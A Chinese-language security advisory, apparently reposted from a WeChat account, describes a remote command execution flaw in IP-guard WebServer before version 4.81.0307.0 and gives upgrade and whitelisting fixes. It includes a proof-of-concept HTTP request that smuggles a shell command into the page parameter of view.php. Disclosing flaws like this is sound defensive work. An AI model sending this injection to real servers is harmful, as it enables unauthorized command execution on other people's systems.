IP-guard WebServer 远程命令执行漏洞

admin 2023年11月14日12:37:45评论346 views字数 798阅读2分39秒阅读模式

IP-guard WebServer 远程命令执行漏洞








IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。









01 漏洞描述

漏洞类型:IP-guard WebServer 远程命令执行漏洞

简述:近日,互联网上披露IP-guard WebServer远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。漏洞等级为严重。

该漏洞EXP已公开,相关用户请提高关注。
POC
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+123456+>1.txt HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9


02 漏洞影响版本

IP-guard WebServer < 4.81.0307.0




03 漏洞修复方案

正式修复方案
此漏洞安全版本为4.81.0307.0,请相关用户升级到安全版本及以上版本,以完全修复该漏洞

临时防护措施
限制IP-guard WebServer的访问,设置白名单访问机制,仅对可信地址开放。


04 参考链接

https://blog.csdn.net/qq_41904294/article/details/134322610

https://www.ip-guard.net/

END

原文始发于微信公众号(锋刃科技):IP-guard WebServer 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月14日12:37:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IP-guard WebServer 远程命令执行漏洞https://cn-sec.com/archives/2199126.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息